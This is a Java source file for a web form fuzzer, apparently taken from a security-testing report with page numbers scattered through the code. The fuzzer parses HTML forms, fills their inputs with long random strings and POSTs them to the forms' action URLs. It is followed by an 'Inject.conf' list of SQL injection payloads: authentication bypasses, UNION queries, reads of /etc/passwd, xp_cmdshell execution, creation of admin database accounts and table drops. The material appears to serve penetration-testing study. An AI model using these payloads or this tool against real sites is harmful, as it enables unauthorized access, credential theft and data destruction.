import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.io.UnsupportedEncodingException;
import java.net.MalformedURLException;
import java.net.URLEncoder;
import java.util.List;
import java.util.Random;
import java.util.StringTokenizer;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import net.htmlparser.jericho.Attributes;
import net.htmlparser.jericho.HTMLElementName;
import net.htmlparser.jericho.OutputDocument;
import net.htmlparser.jericho.Source;
import net.htmlparser.jericho.StartTag;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpStatus;
import org.apache.commons.httpclient.methods.PostMethod;
class BufferOverflow {
private static int countForms = 0;
private static int countInputs = 0;
private static String var;
private static int []arrayBuffer = new int[5];
public static String globalURL;
public static boolean globalDetailFlag = false;
public static boolean flipFlop = false;

/**
* Initialize the Array
* */
public BufferOverflow() {
for(int i=0;i<arrayBuffer.length;i++) {
arrayBuffer[i]=0;
}
}

/**
* Showcases the analysis of Buffer Overflow
* */
public static void analyzeBufferOverflow() {

System.out.println("###########################################################
#############################################################");
System.out.println("<---BUFFER OVERFLOW ANALYSIS--->");
System.out.println("Total # of Forms: "+countForms);
System.out.println("Total # of Input tags: "+countInputs);
System.out.println("<<-Categorizing the available data on basis of HTTP Status Codes-
>>");
System.out.println("Informational Codes 1xx Series: "+arrayBuffer[0]);
System.out.println("Successful Client Interaction related 2xx Series: "+arrayBuffer[1]);
System.out.println("Redirection related 3xx Series: "+arrayBuffer[2]);
System.out.println("Client Error related 4xx Series: "+arrayBuffer[3]);
System.out.println("Server Error related 5xx Series: "+arrayBuffer[4]);

50
System.out.println("###########################################################
#############################################################");

System.out.println("###########################################################
#############################################################");
System.out.println("For more Information on HTTP Status Code Series, refer the
'HTTP_STATUS_CODE.pdf' in Document folder.");

System.out.println("###########################################################
#############################################################");
}

/**
* Traverses over the HTML source file and embeds random String into the
* value of the 'input' tag*/
private static void sendBack(String data) throws MalformedURLException,IOException
{ HttpClient client = new HttpClient();
client.getParams().setParameter("http.useragent", "Mozilla/5.0 (X11; U; Linux i686; en-
US; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10");
if(globalDetailFlag==true) {
System.out.println("URL: "+var);
System.out.println("Data passed: "+data);
}

PostMethod method = new PostMethod(var);


BufferedReader br = null;
StringTokenizer str = new StringTokenizer(data,"#");
if(globalDetailFlag==true)
System.out.println("Total # of Input Fields: "+str.countTokens());
countInputs+=str.countTokens();
while(str.hasMoreTokens()) {
StringTokenizer strr = new StringTokenizer(str.nextToken(),",");
String attrib = strr.nextToken();
String value = strr.nextToken();
method.addParameter(attrib,value);
}
try{
int returnCode = client.executeMethod(method);
if(globalDetailFlag==true)
System.out.println("Return: "+method.getStatusCode()+" "+method.getStatusText() );
arrayBuffer[(method.getStatusCode()/100)-1]++;
if(returnCode == HttpStatus.SC_NOT_IMPLEMENTED) {
System.err.println("The Post method is not implemented by this URI");
method.getResponseBodyAsString();
}
else {
br = new BufferedReader(new InputStreamReader(method.getResponseBodyAsStream()));
String readLine;
PrintWriter pw = new PrintWriter("temp.html");
pw.println("Address: "+var);
while(((readLine = br.readLine()) != null)) {
pw.println(readLine);
pw.flush();
}
}
}
catch (Exception e) {
System.err.println(e);
}

50
finally {
//new ProcessBuilder("firefox", "temp.html").start();
method.releaseConnection();
if(br != null)
try {
br.close();
}
catch (Exception fe) {}
}
}
/**
* Randomly generates a long String
* */
private static String randomizer() {
String str1=new
String("QAa0bcLdUK2eHfJgTP8XhiFj61DOklNm9nBoI5pGqYVrs3CtSuMZvwWx4yE7zR");
StringBuffer sb=new StringBuffer();
Random r = new Random();
int te=0;
for(int i=1;i<=300;i++){
te=r.nextInt(62);
sb.append(str1.charAt(te));
}
String token1 = sb.toString();
return token1;
}
/**Parses over the HTML file and populates the List data structure*/
public static void parseInput() throws IOException{
Source source = null;
try {
source = new Source(new FileReader("page.loaded"));
}
catch (FileNotFoundException fnfe) {
System.err.println("File not found. Error: "+fnfe.getMessage());
}
catch (IOException ioe) {
System.err.println("IOException occurred. Error: "+ioe.getMessage());
}
int currentForm = 0;
List<StartTag> branches=source.getAllStartTags(HTMLElementName.FORM);
countForms = branches.size();
System.out.println("###########################################################
#############################################################");
Attributes attr;
String data = "";
String str = "",pattern = "",temp = "";
String[] tempStr = null;
for(StartTag sj:branches) {
currentForm++;
attr=sj.getAttributes();
data="";
List<StartTag> segments = sj.getElement().getAllStartTags(HTMLElementName.INPUT);
str = "";
pattern = "";
temp = "";
tempStr = null;
boolean radioSelect = false;
boolean checkSelect = false;
for (StartTag startTag : segments) {
str = "";

51
temp="";
Attributes attributes=startTag.getAttributes();
String random = randomizer();
String rel=attributes.getValue("type");
if(rel==null)
continue;
if(rel.equalsIgnoreCase("text") || rel.equalsIgnoreCase("hidden") ||
rel.equalsIgnoreCase("password")) {
str = startTag.toString();
if(str.contains("value")) {
String atrString = attributes.toString();
StringTokenizer strAtr = new StringTokenizer(atrString);
String strtag = "<input ";
while(strAtr.hasMoreTokens()) {
String strA = strAtr.nextToken();
if(!strA.contains("value")) {
strtag = strtag+strA+" ";
}
}
strtag=strtag+"value=\""+random+"\"/>";
temp=strtag;
}
else {
pattern = "/>";
Pattern p = Pattern.compile(pattern);
Matcher m = null;
if(p.matcher(str).find()) {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = "/>";
String replace = " value=\""+random+"\"/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
else {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = ">";
String replace = " value=\""+random+"\"/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
}
try {
data+=URLEncoder.encode(attributes.getValue("name"),"UTF-8")+ "," +
URLEncoder.encode(random, "UTF-8")+"#";
}
catch(UnsupportedEncodingException uee) {
System.err.println("Unsupported error");
}
}
else if(rel.equalsIgnoreCase("radio") && radioSelect==false) {

52
radioSelect=true;
str = startTag.toString();
if(str.contains("checked")) {
String atrString = attributes.toString();
StringTokenizer strAtr = new StringTokenizer(atrString);
String strtag = "<input ";
while(strAtr.hasMoreTokens()) {
String strA = strAtr.nextToken();
if(!strA.contains("")) {
strtag = strtag+strA+" ";
}
}
strtag=strtag+"value=\""+randomizer()+"\"/>";
temp=strtag;
System.out.println("Line: "+rel+" is checked");
}
else {
pattern = "/>";
Pattern p = Pattern.compile(pattern);
Matcher m = null;
if(p.matcher(str).find()) {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = "/>";
String replace = " checked/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
else {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = ">";
String replace = " checked/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
}
try {
data+=URLEncoder.encode(attributes.getValue("name"),"UTF-8")+ "," +
URLEncoder.encode("checked", "UTF-8")+"#";
}
catch(UnsupportedEncodingException uee) {
System.err.println("Unsupported error");
}
}
else if(rel.equalsIgnoreCase("checkbox")) {
str = startTag.toString();
if(str.contains("checked")) {
String atrString = attributes.toString();
StringTokenizer strAtr = new StringTokenizer(atrString);
String strtag = "<input ";
while(strAtr.hasMoreTokens()) {

53
String strA = strAtr.nextToken();
if(!strA.contains("")) {
strtag = strtag+strA+" ";
}
}
strtag=strtag+"value=\""+randomizer()+"\"/>";
temp=strtag;
System.out.println("Line: "+rel+" is checked");
}
else {
pattern = "/>";
Pattern p = Pattern.compile(pattern);
Matcher m = null;
if(p.matcher(str).find()) {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = "/>";
String replace = " checked/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
else {
tempStr = str.split(" ");
int last = tempStr.length-1;
pattern = ">";
String replace = " checked/>";
p = Pattern.compile(pattern);
m = p.matcher(tempStr[last]);
tempStr[last]=m.replaceFirst(replace);
temp="";
for(int j=0;j<tempStr.length;j++)
temp = temp+tempStr[j]+" ";
}
}
try {
data+=URLEncoder.encode(attributes.getValue("name"),"UTF-8")+ "," +
URLEncoder.encode("checked", "UTF-8")+"#";
}
catch(UnsupportedEncodingException uee) {
System.err.println("Unsupported error");
}
}
}
var=attr.getValue("action");
//new FileWriter("temp.html").append(var);
if(var==null || var.equals("")) {
continue;
}
if(var.charAt(0)=='/') {
var=globalURL+var;
}
else if(!var.contains("http") & !var.contains("https")& !var.contains("www")) {
int ind=globalURL.lastIndexOf("/");
int cind=globalURL.lastIndexOf("//");
String rt;
if(ind==cind+1) {

54
rt=globalURL;
}
else {
rt=globalURL.substring(0,ind);
}
var=rt+'/'+var;
}
//new ProcessBuilder("C:\\Program Files\\Mozilla Firefox\\firefox", "temp.html").start();
if(globalDetailFlag==true) {
System.out.println("data: "+data);
System.out.println("Form #: "+currentForm);
}
if(globalDetailFlag==false)
if(flipFlop==false) {
System.out.println(">>");
flipFlop=true;
}
else {
System.out.println("<<");
flipFlop=false;
}
sendBack(data);
if(globalDetailFlag==true)
System.out.println("###########################################################
#############################################################");
}
}
}

55
Inject.conf:
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
'||'6
(||6)
' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Admin' OR '
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects
WHERE name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing'
' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select

56
Password:*/=1--
UNI/**/ON SEL/**/ECT
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
'; EXEC ('SEL' + 'ECT US' + 'ER')
'/**/OR/**/1/**/=/**/1
' or 1/*
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+&password=
'; begin declare @var varchar(8000) set @var=':' select
@var=@var+'+login+'/'+password+' ' from users where login >
@var select @var as var into temp end --
' and 1 in (select var from temp)--
' union select 1,load_file('/etc/passwd'),1,1,1;
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
CREATE USER name IDENTIFIED BY 'pass123'
CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE
temp DEFAULT TABLESPACE users;
' ; drop table temp --
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost',
PASSWORD('pass123'))
GRANT CONNECT TO name; GRANT RESOURCE TO name;
INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) +
char(0x74) + char(0x65) + char(0x72) + char(0x70)
+ char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

57